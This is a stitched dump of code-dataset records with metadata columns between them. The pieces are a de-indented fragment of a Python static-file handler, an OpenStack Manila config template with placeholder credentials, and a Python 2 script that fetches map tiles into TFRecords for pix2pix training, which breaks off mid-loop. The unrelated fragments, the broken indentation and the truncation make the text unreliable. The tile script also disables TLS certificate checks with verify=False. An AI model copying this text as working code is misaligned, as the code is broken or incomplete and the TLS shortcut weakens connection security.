body = util.static(filepath)
if filepath.endswith('.css'):
content_type = 'text/css'
elif filepath.endswith('.js'):
content_type = 'text/javascript'
elif filepath.endswith('.html'):
content_type = 'text/html'
elif filepath.endswith('.png'):
content_type = 'image/png'
except:
pass
return dream.Response(body=body, content_type=content_type) | mit | -1,459,676,298,214,296,800 | 34.263158 | 134 | 0.611346 | false | 3.940196 | false | false | false |
nofdev/playback | playback/templates/manila_conf.py | 2 | 27513 | conf_manila_conf = """[DEFAULT]
default_share_type = default_share_type
rootwrap_config = /etc/manila/rootwrap.conf
auth_strategy = keystone
my_ip = {{ my_ip }}
#
# From oslo.messaging
#
# Size of RPC connection pool. (integer value)
# Deprecated group/name - [DEFAULT]/rpc_conn_pool_size
#rpc_conn_pool_size = 30
# ZeroMQ bind address. Should be a wildcard (*), an ethernet
# interface, or IP. The "host" option should point or resolve to this
# address. (string value)
#rpc_zmq_bind_address = *
# MatchMaker driver. (string value)
# Allowed values: redis, dummy
#rpc_zmq_matchmaker = redis
# Type of concurrency used. Either "native" or "eventlet" (string
# value)
#rpc_zmq_concurrency = eventlet
# Number of ZeroMQ contexts, defaults to 1. (integer value)
#rpc_zmq_contexts = 1
# Maximum number of ingress messages to locally buffer per topic.
# Default is unlimited. (integer value)
#rpc_zmq_topic_backlog = <None>
# Directory for holding IPC sockets. (string value)
#rpc_zmq_ipc_dir = /var/run/openstack
# Name of this node. Must be a valid hostname, FQDN, or IP address.
# Must match "host" option, if running Nova. (string value)
#rpc_zmq_host = localhost
# Seconds to wait before a cast expires (TTL). The default value of -1
# specifies an infinite linger period. The value of 0 specifies no
# linger period. Pending messages shall be discarded immediately when
# the socket is closed. Only supported by impl_zmq. (integer value)
#rpc_cast_timeout = -1
# The default number of seconds that poll should wait. Poll raises
# timeout exception when timeout expired. (integer value)
#rpc_poll_timeout = 1
# Expiration timeout in seconds of a name service record about
# existing target ( < 0 means no timeout). (integer value)
#zmq_target_expire = 120
# Use PUB/SUB pattern for fanout methods. PUB/SUB always uses proxy.
# (boolean value)
#use_pub_sub = true
# Minimal port number for random ports range. (port value)
# Minimum value: 0
# Maximum value: 65535
#rpc_zmq_min_port = 49152
# Maximal port number for random ports range. (integer value)
# Minimum value: 1
# Maximum value: 65536
#rpc_zmq_max_port = 65536
# Number of retries to find free port number before fail with
# ZMQBindError. (integer value)
#rpc_zmq_bind_port_retries = 100
# Size of executor thread pool. (integer value)
# Deprecated group/name - [DEFAULT]/rpc_thread_pool_size
#executor_thread_pool_size = 64
# Seconds to wait for a response from a call. (integer value)
#rpc_response_timeout = 60
# A URL representing the messaging driver to use and its full
# configuration. If not set, we fall back to the rpc_backend option
# and driver specific configuration. (string value)
#transport_url = <None>
# The messaging driver to use, defaults to rabbit. Other drivers
# include amqp and zmq. (string value)
rpc_backend = rabbit
# The default exchange under which topics are scoped. May be
# overridden by an exchange name specified in the transport_url
# option. (string value)
#control_exchange = openstack
[cors]
#
# From oslo.middleware.cors
#
# Indicate whether this resource may be shared with the domain
# received in the requests "origin" header. (list value)
#allowed_origin = <None>
# Indicate that the actual request can include user credentials
# (boolean value)
#allow_credentials = true
# Indicate which headers are safe to expose to the API. Defaults to
# HTTP Simple Headers. (list value)
#expose_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma
# Maximum cache age of CORS preflight requests. (integer value)
#max_age = 3600
# Indicate which methods can be used during the actual request. (list
# value)
#allow_methods = GET,POST,PUT,DELETE,OPTIONS
# Indicate which header field names may be used during the actual
# request. (list value)
#allow_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma
[cors.subdomain]
#
# From oslo.middleware.cors
#
# Indicate whether this resource may be shared with the domain
# received in the requests "origin" header. (list value)
#allowed_origin = <None>
# Indicate that the actual request can include user credentials
# (boolean value)
#allow_credentials = true
# Indicate which headers are safe to expose to the API. Defaults to
# HTTP Simple Headers. (list value)
#expose_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma
# Maximum cache age of CORS preflight requests. (integer value)
#max_age = 3600
# Indicate which methods can be used during the actual request. (list
# value)
#allow_methods = GET,POST,PUT,DELETE,OPTIONS
# Indicate which header field names may be used during the actual
# request. (list value)
#allow_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma
[database]
#
# From oslo.db
#
# The file name to use with SQLite. (string value)
# Deprecated group/name - [DEFAULT]/sqlite_db
#sqlite_db = oslo.sqlite
# If True, SQLite uses synchronous mode. (boolean value)
# Deprecated group/name - [DEFAULT]/sqlite_synchronous
#sqlite_synchronous = true
# The back end to use for the database. (string value)
# Deprecated group/name - [DEFAULT]/db_backend
#backend = sqlalchemy
# The SQLAlchemy connection string to use to connect to the database.
# (string value)
# Deprecated group/name - [DEFAULT]/sql_connection
# Deprecated group/name - [DATABASE]/sql_connection
# Deprecated group/name - [sql]/connection
connection = {{ connection }}
# The SQLAlchemy connection string to use to connect to the slave
# database. (string value)
#slave_connection = <None>
# The SQL mode to be used for MySQL sessions. This option, including
# the default, overrides any server-set SQL mode. To use whatever SQL
# mode is set by the server configuration, set this to no value.
# Example: mysql_sql_mode= (string value)
#mysql_sql_mode = TRADITIONAL
# Timeout before idle SQL connections are reaped. (integer value)
# Deprecated group/name - [DEFAULT]/sql_idle_timeout
# Deprecated group/name - [DATABASE]/sql_idle_timeout
# Deprecated group/name - [sql]/idle_timeout
#idle_timeout = 3600
# Minimum number of SQL connections to keep open in a pool. (integer
# value)
# Deprecated group/name - [DEFAULT]/sql_min_pool_size
# Deprecated group/name - [DATABASE]/sql_min_pool_size
#min_pool_size = 1
# Maximum number of SQL connections to keep open in a pool. (integer
# value)
# Deprecated group/name - [DEFAULT]/sql_max_pool_size
# Deprecated group/name - [DATABASE]/sql_max_pool_size
#max_pool_size = <None>
# Maximum number of database connection retries during startup. Set to
# -1 to specify an infinite retry count. (integer value)
# Deprecated group/name - [DEFAULT]/sql_max_retries
# Deprecated group/name - [DATABASE]/sql_max_retries
#max_retries = 10
# Interval between retries of opening a SQL connection. (integer
# value)
# Deprecated group/name - [DEFAULT]/sql_retry_interval
# Deprecated group/name - [DATABASE]/reconnect_interval
#retry_interval = 10
# If set, use this value for max_overflow with SQLAlchemy. (integer
# value)
# Deprecated group/name - [DEFAULT]/sql_max_overflow
# Deprecated group/name - [DATABASE]/sqlalchemy_max_overflow
#max_overflow = 50
# Verbosity of SQL debugging information: 0=None, 100=Everything.
# (integer value)
# Deprecated group/name - [DEFAULT]/sql_connection_debug
#connection_debug = 0
# Add Python stack traces to SQL as comment strings. (boolean value)
# Deprecated group/name - [DEFAULT]/sql_connection_trace
#connection_trace = false
# If set, use this value for pool_timeout with SQLAlchemy. (integer
# value)
# Deprecated group/name - [DATABASE]/sqlalchemy_pool_timeout
#pool_timeout = <None>
# Enable the experimental use of database reconnect on connection
# lost. (boolean value)
#use_db_reconnect = false
# Seconds between retries of a database transaction. (integer value)
#db_retry_interval = 1
# If True, increases the interval between retries of a database
# operation up to db_max_retry_interval. (boolean value)
#db_inc_retry_interval = true
# If db_inc_retry_interval is set, the maximum seconds between retries
# of a database operation. (integer value)
#db_max_retry_interval = 10
# Maximum retries in case of connection error or deadlock error before
# error is raised. Set to -1 to specify an infinite retry count.
# (integer value)
#db_max_retries = 20
#
# From oslo.db.concurrency
#
# Enable the experimental use of thread pooling for all DB API calls
# (boolean value)
# Deprecated group/name - [DEFAULT]/dbapi_use_tpool
#use_tpool = false
[keystone_authtoken]
#
# From keystonemiddleware.auth_token
#
# Complete public Identity API endpoint. (string value)
auth_uri = {{ auth_uri }}
auth_url = {{ auth_url }}
# API version of the admin Identity API endpoint. (string value)
#auth_version = <None>
# Do not handle authorization requests within the middleware, but
# delegate the authorization decision to downstream WSGI components.
# (boolean value)
#delay_auth_decision = false
# Request timeout value for communicating with Identity API server.
# (integer value)
#http_connect_timeout = <None>
# How many times are we trying to reconnect when communicating with
# Identity API Server. (integer value)
#http_request_max_retries = 3
# Env key for the swift cache. (string value)
#cache = <None>
# Required if identity server requires client certificate (string
# value)
#certfile = <None>
# Required if identity server requires client certificate (string
# value)
#keyfile = <None>
# A PEM encoded Certificate Authority to use when verifying HTTPs
# connections. Defaults to system CAs. (string value)
#cafile = <None>
# Verify HTTPS connections. (boolean value)
#insecure = false
# The region in which the identity server can be found. (string value)
#region_name = <None>
# Directory used to cache files related to PKI tokens. (string value)
#signing_dir = <None>
# Optionally specify a list of memcached server(s) to use for caching.
# If left undefined, tokens will instead be cached in-process. (list
# value)
# Deprecated group/name - [DEFAULT]/memcache_servers
memcached_servers = {{ memcached_servers }}
# In order to prevent excessive effort spent validating tokens, the
# middleware caches previously-seen tokens for a configurable duration
# (in seconds). Set to -1 to disable caching completely. (integer
# value)
#token_cache_time = 300
# Determines the frequency at which the list of revoked tokens is
# retrieved from the Identity service (in seconds). A high number of
# revocation events combined with a low cache duration may
# significantly reduce performance. (integer value)
#revocation_cache_time = 10
# (Optional) If defined, indicate whether token data should be
# authenticated or authenticated and encrypted. If MAC, token data is
# authenticated (with HMAC) in the cache. If ENCRYPT, token data is
# encrypted and authenticated in the cache. If the value is not one of
# these options or empty, auth_token will raise an exception on
# initialization. (string value)
# Allowed values: None, MAC, ENCRYPT
#memcache_security_strategy = None
# (Optional, mandatory if memcache_security_strategy is defined) This
# string is used for key derivation. (string value)
#memcache_secret_key = <None>
# (Optional) Number of seconds memcached server is considered dead
# before it is tried again. (integer value)
#memcache_pool_dead_retry = 300
# (Optional) Maximum total number of open connections to every
# memcached server. (integer value)
#memcache_pool_maxsize = 10
# (Optional) Socket timeout in seconds for communicating with a
# memcached server. (integer value)
#memcache_pool_socket_timeout = 3
# (Optional) Number of seconds a connection to memcached is held
# unused in the pool before it is closed. (integer value)
#memcache_pool_unused_timeout = 60
# (Optional) Number of seconds that an operation will wait to get a
# memcached client connection from the pool. (integer value)
#memcache_pool_conn_get_timeout = 10
# (Optional) Use the advanced (eventlet safe) memcached client pool.
# The advanced pool will only work under python 2.x. (boolean value)
#memcache_use_advanced_pool = false
# (Optional) Indicate whether to set the X-Service-Catalog header. If
# False, middleware will not ask for service catalog on token
# validation and will not set the X-Service-Catalog header. (boolean
# value)
#include_service_catalog = true
# Used to control the use and type of token binding. Can be set to:
# "disabled" to not check token binding. "permissive" (default) to
# validate binding information if the bind type is of a form known to
# the server and ignore it if not. "strict" like "permissive" but if
# the bind type is unknown the token will be rejected. "required" any
# form of token binding is needed to be allowed. Finally the name of a
# binding method that must be present in tokens. (string value)
#enforce_token_bind = permissive
# If true, the revocation list will be checked for cached tokens. This
# requires that PKI tokens are configured on the identity server.
# (boolean value)
#check_revocations_for_cached = false
# Hash algorithms to use for hashing PKI tokens. This may be a single
# algorithm or multiple. The algorithms are those supported by Python
# standard hashlib.new(). The hashes will be tried in the order given,
# so put the preferred one first for performance. The result of the
# first hash will be stored in the cache. This will typically be set
# to multiple values only while migrating from a less secure algorithm
# to a more secure one. Once all the old tokens are expired this
# option should be set to a single value for better performance. (list
# value)
#hash_algorithms = md5
# Prefix to prepend at the beginning of the path. Deprecated, use
# identity_uri. (string value)
#auth_admin_prefix =
# Host providing the admin Identity API endpoint. Deprecated, use
# identity_uri. (string value)
#auth_host = 127.0.0.1
# Port of the admin Identity API endpoint. Deprecated, use
# identity_uri. (integer value)
#auth_port = 35357
# Protocol of the admin Identity API endpoint. Deprecated, use
# identity_uri. (string value)
# Allowed values: http, https
#auth_protocol = https
# Complete admin Identity API endpoint. This should specify the
# unversioned root endpoint e.g. https://localhost:35357/ (string
# value)
#identity_uri = <None>
# This option is deprecated and may be removed in a future release.
# Single shared secret with the Keystone configuration used for
# bootstrapping a Keystone installation, or otherwise bypassing the
# normal authentication process. This option should not be used, use
# `admin_user` and `admin_password` instead. (string value)
#admin_token = <None>
# Service username. (string value)
#admin_user = <None>
# Service user password. (string value)
#admin_password = <None>
# Service tenant name. (string value)
#admin_tenant_name = admin
# Authentication type to load (unknown value)
# Deprecated group/name - [DEFAULT]/auth_plugin
auth_type = password
# Config Section from which to load plugin specific options (unknown
# value)
#auth_section = <None>
project_domain_name = default
user_domain_name = default
project_name = service
username = manila
password = {{ manila_pass }}
[matchmaker_redis]
#
# From oslo.messaging
#
# Host to locate redis. (string value)
#host = 127.0.0.1
# Use this port to connect to redis host. (port value)
# Minimum value: 0
# Maximum value: 65535
#port = 6379
# Password for Redis server (optional). (string value)
#password =
# List of Redis Sentinel hosts (fault tolerance mode) e.g.
# [host:port, host1:port ... ] (list value)
#sentinel_hosts =
# Redis replica set name. (string value)
#sentinel_group_name = oslo-messaging-zeromq
# Time in ms to wait between connection attempts. (integer value)
#wait_timeout = 500
# Time in ms to wait before the transaction is killed. (integer value)
#check_timeout = 20000
# Timeout in ms on blocking socket operations (integer value)
#socket_timeout = 1000
[oslo_messaging_amqp]
#
# From oslo.messaging
#
# address prefix used when sending to a specific server (string value)
# Deprecated group/name - [amqp1]/server_request_prefix
#server_request_prefix = exclusive
# address prefix used when broadcasting to all servers (string value)
# Deprecated group/name - [amqp1]/broadcast_prefix
#broadcast_prefix = broadcast
# address prefix when sending to any server in group (string value)
# Deprecated group/name - [amqp1]/group_request_prefix
#group_request_prefix = unicast
# Name for the AMQP container (string value)
# Deprecated group/name - [amqp1]/container_name
#container_name = <None>
# Timeout for inactive connections (in seconds) (integer value)
# Deprecated group/name - [amqp1]/idle_timeout
#idle_timeout = 0
# Debug: dump AMQP frames to stdout (boolean value)
# Deprecated group/name - [amqp1]/trace
#trace = false
# CA certificate PEM file to verify server certificate (string value)
# Deprecated group/name - [amqp1]/ssl_ca_file
#ssl_ca_file =
# Identifying certificate PEM file to present to clients (string
# value)
# Deprecated group/name - [amqp1]/ssl_cert_file
#ssl_cert_file =
# Private key PEM file used to sign cert_file certificate (string
# value)
# Deprecated group/name - [amqp1]/ssl_key_file
#ssl_key_file =
# Password for decrypting ssl_key_file (if encrypted) (string value)
# Deprecated group/name - [amqp1]/ssl_key_password
#ssl_key_password = <None>
# Accept clients using either SSL or plain TCP (boolean value)
# Deprecated group/name - [amqp1]/allow_insecure_clients
#allow_insecure_clients = false
# Space separated list of acceptable SASL mechanisms (string value)
# Deprecated group/name - [amqp1]/sasl_mechanisms
#sasl_mechanisms =
# Path to directory that contains the SASL configuration (string
# value)
# Deprecated group/name - [amqp1]/sasl_config_dir
#sasl_config_dir =
# Name of configuration file (without .conf suffix) (string value)
# Deprecated group/name - [amqp1]/sasl_config_name
#sasl_config_name =
# User name for message broker authentication (string value)
# Deprecated group/name - [amqp1]/username
#username =
# Password for message broker authentication (string value)
# Deprecated group/name - [amqp1]/password
#password =
[oslo_messaging_notifications]
#
# From oslo.messaging
#
# The Drivers(s) to handle sending notifications. Possible values are
# messaging, messagingv2, routing, log, test, noop (multi valued)
# Deprecated group/name - [DEFAULT]/notification_driver
#driver =
# A URL representing the messaging driver to use for notifications. If
# not set, we fall back to the same configuration used for RPC.
# (string value)
# Deprecated group/name - [DEFAULT]/notification_transport_url
#transport_url = <None>
# AMQP topic used for OpenStack notifications. (list value)
# Deprecated group/name - [rpc_notifier2]/topics
# Deprecated group/name - [DEFAULT]/notification_topics
#topics = notifications
[oslo_messaging_rabbit]
#
# From oslo.messaging
#
# Use durable queues in AMQP. (boolean value)
# Deprecated group/name - [DEFAULT]/amqp_durable_queues
# Deprecated group/name - [DEFAULT]/rabbit_durable_queues
#amqp_durable_queues = false
# Auto-delete queues in AMQP. (boolean value)
# Deprecated group/name - [DEFAULT]/amqp_auto_delete
#amqp_auto_delete = false
# SSL version to use (valid only if SSL enabled). Valid values are
# TLSv1 and SSLv23. SSLv2, SSLv3, TLSv1_1, and TLSv1_2 may be
# available on some distributions. (string value)
# Deprecated group/name - [DEFAULT]/kombu_ssl_version
#kombu_ssl_version =
# SSL key file (valid only if SSL enabled). (string value)
# Deprecated group/name - [DEFAULT]/kombu_ssl_keyfile
#kombu_ssl_keyfile =
# SSL cert file (valid only if SSL enabled). (string value)
# Deprecated group/name - [DEFAULT]/kombu_ssl_certfile
#kombu_ssl_certfile =
# SSL certification authority file (valid only if SSL enabled).
# (string value)
# Deprecated group/name - [DEFAULT]/kombu_ssl_ca_certs
#kombu_ssl_ca_certs =
# How long to wait before reconnecting in response to an AMQP consumer
# cancel notification. (floating point value)
# Deprecated group/name - [DEFAULT]/kombu_reconnect_delay
#kombu_reconnect_delay = 1.0
# EXPERIMENTAL: Possible values are: gzip, bz2. If not set compression
# will not be used. This option may notbe available in future
# versions. (string value)
#kombu_compression = <None>
# How long to wait a missing client beforce abandoning to send it its
# replies. This value should not be longer than rpc_response_timeout.
# (integer value)
# Deprecated group/name - [DEFAULT]/kombu_reconnect_timeout
#kombu_missing_consumer_retry_timeout = 60
# Determines how the next RabbitMQ node is chosen in case the one we
# are currently connected to becomes unavailable. Takes effect only if
# more than one RabbitMQ node is provided in config. (string value)
# Allowed values: round-robin, shuffle
#kombu_failover_strategy = round-robin
# The RabbitMQ broker address where a single node is used. (string
# value)
# Deprecated group/name - [DEFAULT]/rabbit_host
#rabbit_host = localhost
# The RabbitMQ broker port where a single node is used. (port value)
# Minimum value: 0
# Maximum value: 65535
# Deprecated group/name - [DEFAULT]/rabbit_port
#rabbit_port = 5672
# RabbitMQ HA cluster host:port pairs. (list value)
# Deprecated group/name - [DEFAULT]/rabbit_hosts
#rabbit_hosts = $rabbit_host:$rabbit_port
rabbit_hosts = {{ rabbit_hosts }}
# Connect over SSL for RabbitMQ. (boolean value)
# Deprecated group/name - [DEFAULT]/rabbit_use_ssl
#rabbit_use_ssl = false
# The RabbitMQ userid. (string value)
# Deprecated group/name - [DEFAULT]/rabbit_userid
rabbit_userid = {{ rabbit_userid }}
# The RabbitMQ password. (string value)
# Deprecated group/name - [DEFAULT]/rabbit_password
rabbit_password = {{ rabbit_password }}
# The RabbitMQ login method. (string value)
# Deprecated group/name - [DEFAULT]/rabbit_login_method
#rabbit_login_method = AMQPLAIN
# The RabbitMQ virtual host. (string value)
# Deprecated group/name - [DEFAULT]/rabbit_virtual_host
#rabbit_virtual_host = /
# How frequently to retry connecting with RabbitMQ. (integer value)
#rabbit_retry_interval = 1
# How long to backoff for between retries when connecting to RabbitMQ.
# (integer value)
# Deprecated group/name - [DEFAULT]/rabbit_retry_backoff
#rabbit_retry_backoff = 2
# Maximum interval of RabbitMQ connection retries. Default is 30
# seconds. (integer value)
#rabbit_interval_max = 30
# Maximum number of RabbitMQ connection retries. Default is 0
# (infinite retry count). (integer value)
# Deprecated group/name - [DEFAULT]/rabbit_max_retries
#rabbit_max_retries = 0
# Try to use HA queues in RabbitMQ (x-ha-policy: all). If you change
# this option, you must wipe the RabbitMQ database. In RabbitMQ 3.0,
# queue mirroring is no longer controlled by the x-ha-policy argument
# when declaring a queue. If you just want to make sure that all
# queues (except those with auto-generated names) are mirrored across
# all nodes, run: "rabbitmqctl set_policy HA '^(?!amq\.).*' '{"ha-
# mode": "all"}' " (boolean value)
# Deprecated group/name - [DEFAULT]/rabbit_ha_queues
#rabbit_ha_queues = false
# Positive integer representing duration in seconds for queue TTL
# (x-expires). Queues which are unused for the duration of the TTL are
# automatically deleted. The parameter affects only reply and fanout
# queues. (integer value)
# Minimum value: 1
#rabbit_transient_queues_ttl = 1800
# Specifies the number of messages to prefetch. Setting to zero allows
# unlimited messages. (integer value)
#rabbit_qos_prefetch_count = 0
# Number of seconds after which the Rabbit broker is considered down
# if heartbeat's keep-alive fails (0 disable the heartbeat).
# EXPERIMENTAL (integer value)
#heartbeat_timeout_threshold = 60
# How often times during the heartbeat_timeout_threshold we check the
# heartbeat. (integer value)
#heartbeat_rate = 2
# Deprecated, use rpc_backend=kombu+memory or rpc_backend=fake
# (boolean value)
# Deprecated group/name - [DEFAULT]/fake_rabbit
#fake_rabbit = false
# Maximum number of channels to allow (integer value)
#channel_max = <None>
# The maximum byte size for an AMQP frame (integer value)
#frame_max = <None>
# How often to send heartbeats for consumer's connections (integer
# value)
#heartbeat_interval = 1
# Enable SSL (boolean value)
#ssl = <None>
# Arguments passed to ssl.wrap_socket (dict value)
#ssl_options = <None>
# Set socket timeout in seconds for connection's socket (floating
# point value)
#socket_timeout = 0.25
# Set TCP_USER_TIMEOUT in seconds for connection's socket (floating
# point value)
#tcp_user_timeout = 0.25
# Set delay for reconnection to some host which has connection error
# (floating point value)
#host_connection_reconnect_delay = 0.25
# Maximum number of connections to keep queued. (integer value)
#pool_max_size = 10
# Maximum number of connections to create above `pool_max_size`.
# (integer value)
#pool_max_overflow = 0
# Default number of seconds to wait for a connections to available
# (integer value)
#pool_timeout = 30
# Lifetime of a connection (since creation) in seconds or None for no
# recycling. Expired connections are closed on acquire. (integer
# value)
#pool_recycle = 600
# Threshold at which inactive (since release) connections are
# considered stale in seconds or None for no staleness. Stale
# connections are closed on acquire. (integer value)
#pool_stale = 60
# Persist notification messages. (boolean value)
#notification_persistence = false
# Exchange name for for sending notifications (string value)
#default_notification_exchange = ${control_exchange}_notification
# Max number of not acknowledged message which RabbitMQ can send to
# notification listener. (integer value)
#notification_listener_prefetch_count = 100
# Reconnecting retry count in case of connectivity problem during
# sending notification, -1 means infinite retry. (integer value)
#default_notification_retry_attempts = -1
# Reconnecting retry delay in case of connectivity problem during
# sending notification message (floating point value)
#notification_retry_delay = 0.25
# Time to live for rpc queues without consumers in seconds. (integer
# value)
#rpc_queue_expiration = 60
# Exchange name for sending RPC messages (string value)
#default_rpc_exchange = ${control_exchange}_rpc
# Exchange name for receiving RPC replies (string value)
#rpc_reply_exchange = ${control_exchange}_rpc_reply
# Max number of not acknowledged message which RabbitMQ can send to
# rpc listener. (integer value)
#rpc_listener_prefetch_count = 100
# Max number of not acknowledged message which RabbitMQ can send to
# rpc reply listener. (integer value)
#rpc_reply_listener_prefetch_count = 100
# Reconnecting retry count in case of connectivity problem during
# sending reply. -1 means infinite retry during rpc_timeout (integer
# value)
#rpc_reply_retry_attempts = -1
# Reconnecting retry delay in case of connectivity problem during
# sending reply. (floating point value)
#rpc_reply_retry_delay = 0.25
# Reconnecting retry count in case of connectivity problem during
# sending RPC message, -1 means infinite retry. If actual retry
# attempts in not 0 the rpc request could be processed more then one
# time (integer value)
#default_rpc_retry_attempts = -1
# Reconnecting retry delay in case of connectivity problem during
# sending RPC message (floating point value)
#rpc_retry_delay = 0.25
[oslo_concurrency]
lock_path = /var/lib/manila/tmp
""" | mit | 6,409,555,381,335,465,000 | 31.793802 | 90 | 0.75368 | false | 3.569408 | true | false | false |
NARO-41605/pix2pix_map_tiles | DataSetMake_tfwiter.py | 1 | 9657 | # -*- coding: utf-8 -*
import scipy.io
from PIL import Image
import numpy as np
import random
import scipy.ndimage
from skimage.transform import rotate
import os
import argparse
import requests
from cStringIO import StringIO
import glob
import math
import tensorflow as tf
import json
parser = argparse.ArgumentParser(description='MyScript')
parser.add_argument('images_x_start', type=int)
parser.add_argument('images_x_end', type=int)
parser.add_argument('images_y_start', type=int)
parser.add_argument('images_y_end', type=int)
parser.add_argument('zoom_level', type=int)
parser.add_argument('--inputJson', default="./jsonSample.txt")
parser.add_argument('--outputPath', default="Data")
args = parser.parse_args()
TILE_SIZE = 256
#jsonFile = open(args.inputJson)
#json_dict = json.load(jsonFile)
with open(args.inputJson, 'r') as json_fp:
json_dict = json.loads(json_fp.read(),'utf-8')
print (str(json_dict))
INPUT_URL = json_dict['inputURL']
TARGET_URL = json_dict['targetURL']
OUTPUT_PATH = os.path.join(os.getcwd(),args.outputPath)
if not os.path.isdir(OUTPUT_PATH):
os.makedirs(OUTPUT_PATH)
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
#kernel_size = args.kernelSize
kernel_size = 1
input_img_num = len(INPUT_URL)
image_size_x = TILE_SIZE * ((args.images_x_end - int(kernel_size / 2) + kernel_size - 1) - (args.images_x_start - int(kernel_size / 2)) + 1)
image_size_y = TILE_SIZE * ((args.images_y_end - int(kernel_size / 2) + kernel_size - 1) - (args.images_y_start - int(kernel_size / 2)) + 1)
input_img = []
for i in range(input_img_num):
input_img.append(Image.new('RGBA', (image_size_x, image_size_y), (0, 0, 0, 0)))
target_img = Image.new('RGBA', (image_size_x, image_size_y), (0, 0, 0, 0))
#imgs_num = 1
def tile2latlon(x, y, z):
lon = (x / 2.0**z) * 360 - 180 # 経度(東経)
mapy = (y / 2.0**z) * 2 * math.pi - math.pi
lat = 2 * math.atan(math.e ** (- mapy)) * 180 / math.pi - 90 # 緯度(北緯)
return [lon,lat]
def demtofloat(n):
if n == 'e':
return 0
else:
return float(n)
def getTile(req_target, i, j, zoom_level):
input_img_p = Image.new('RGBA', (TILE_SIZE, TILE_SIZE), (0, 0, 0, 0))
error_flg = 0
if req_target['type'] == 'localTile':
path_format = req_target['format']
path_format = path_format.replace('{z}', str(zoom_level))
path_format = path_format.replace('{x}', str(i))
path_format = path_format.replace('{y}', str(j))
input_image_path = os.path.join(req_target['path'], path_format)
if os.path.isfile(input_image_path):
input_img_p = Image.open(input_image_path)
input_img_p = input_img_p.resize((TILE_SIZE, TILE_SIZE))
else:
print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
error_flg = 1
return input_img_p, error_flg
else:
if req_target['type'] == 'tile':
url_format = req_target['format']
url_format = url_format.replace('{z}', str(zoom_level))
url_format = url_format.replace('{x}', str(i))
url_format = url_format.replace('{y}', str(j))
input_image_url = req_target['url'] + url_format
elif req_target['type'] == 'wms':
start_point = tile2latlon(i, j, zoom_level)
end_point = tile2latlon(i + 1, j + 1, zoom_level)
url_format = req_target['format']
url_format = url_format.replace('{minx}', str(end_point[1]))
url_format = url_format.replace('{miny}', str(start_point[0]))
url_format = url_format.replace('{maxx}', str(start_point[1]))
url_format = url_format.replace('{maxy}', str(end_point[0]))
url_format = url_format.replace('{maxy}', str(end_point[0]))
url_format = url_format.replace('{output_width}', str(TILE_SIZE))
url_format = url_format.replace('{output_height}', str(TILE_SIZE))
input_image_url = req_target['url'] + url_format
print 'input : ' + input_image_url
res = requests.get(input_image_url, verify=False)
if res.status_code == 200:
content_type = res.headers["content-type"]
if 'image' not in content_type:
print("Not image URL : %d - %d - %d" % (zoom_level, i, j))
error_flg = 1
return input_img_p, error_flg
resfile = StringIO(res.content)
input_img_p = Image.open(resfile)
input_img_p = input_img_p.resize((TILE_SIZE, TILE_SIZE))
else:
print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
error_flg = 1
return input_img_p, error_flg
return input_img_p, error_flg
def dataset_make(images_x_start, images_x_end, images_y_start, images_y_end, zoom_level, imgs_num):
dataset_size_x = TILE_SIZE * (images_x_end - images_x_start + 1)
dataset_size_y = TILE_SIZE * (images_y_end - images_y_start + 1)
dataset_input_img = []
for i in range(input_img_num):
dataset_input_img.append(Image.new('RGBA', (dataset_size_x, dataset_size_y), (0, 0, 0, 0)))
dataset_target_img = Image.new('RGBA', (dataset_size_x, dataset_size_y), (0, 0, 0, 0))
error_flg = 0
for i in range(images_x_start, images_x_end + 1):
for j in range(images_y_start, images_y_end + 1):
if not TARGET_URL == None:
input_img_p, error_flg = getTile(TARGET_URL, i, j, zoom_level)
if error_flg == 1:
print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
return dataset_input_img, dataset_target_img, error_flg
else:
dataset_target_img.paste(input_img_p, ((i - images_x_start) * TILE_SIZE, (j - images_y_start) * TILE_SIZE))
for k, req_target in enumerate(INPUT_URL):
input_img_p, error_flg = getTile(req_target, i, j, zoom_level)
if error_flg == 1:
print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
return dataset_input_img, dataset_target_img, error_flg
else:
dataset_input_img[k].paste(input_img_p, ((i - images_x_start) * TILE_SIZE, (j - images_y_start) * TILE_SIZE))
print("Get tile : %d - %d - %d" % (zoom_level, i, j))
if error_flg == 0:
input_chNum = 0
for tmpimg in dataset_input_img:
input_chNum += np.asarray(tmpimg).shape[2]
print ('input channel : ' + str(input_chNum))
print ('target channel : ' + str(np.asarray(dataset_target_img).shape[2]))
input_img_np = np.zeros((dataset_size_y, dataset_size_x, input_chNum))
input_chNum = 0
for i, tmpimg in enumerate(dataset_input_img):
tmpimg_np = np.asarray(tmpimg)
for j in range(tmpimg_np.shape[2]):
input_img_np[:, :, input_chNum] = tmpimg_np[:, :, j]
input_chNum += 1
input_array_np = input_img_np/127.5 - 1.0
input_array_np_row = input_array_np.tostring()
dataset_target_img_row = np.array(dataset_target_img).tostring()
writer = tf.python_io.TFRecordWriter(os.path.join(OUTPUT_PATH,
str(imgs_num) + '_' + str(images_x_start + int(kernel_size / 2)) + '_' +
str(images_y_start + int(kernel_size / 2)) + '_' + str(zoom_level) + '.tfrecords'))
example = tf.train.Example(features=tf.train.Features(feature={
'height': _int64_feature(dataset_size_y),
'width': _int64_feature(dataset_size_x),
'input_ch': _int64_feature(input_array_np.shape[2]),
'target_ch': _int64_feature(np.array(dataset_target_img).shape[2]),
'input_raw': _bytes_feature(input_array_np_row),
'target_raw': _bytes_feature(dataset_target_img_row)}))
writer.write(example.SerializeToString())
writer.close()
return dataset_input_img, dataset_target_img, error_flg
imgs_num = 1
for i in range(args.images_x_start, args.images_x_end + 1):
for j in range(args.images_y_start, args.images_y_end + 1):
print "----- input : " + str(imgs_num) + " : " + str(args.zoom_level) + "-" + str(i) + "-" + str(j) + " -----"
input_img_p, target_img_p, error_flg = dataset_make(i - int(kernel_size / 2), i - int(kernel_size / 2) + kernel_size - 1,
j - int(kernel_size / 2), j - int(kernel_size / 2) + kernel_size - 1,
args.zoom_level, imgs_num)
for k in range(input_img_num):
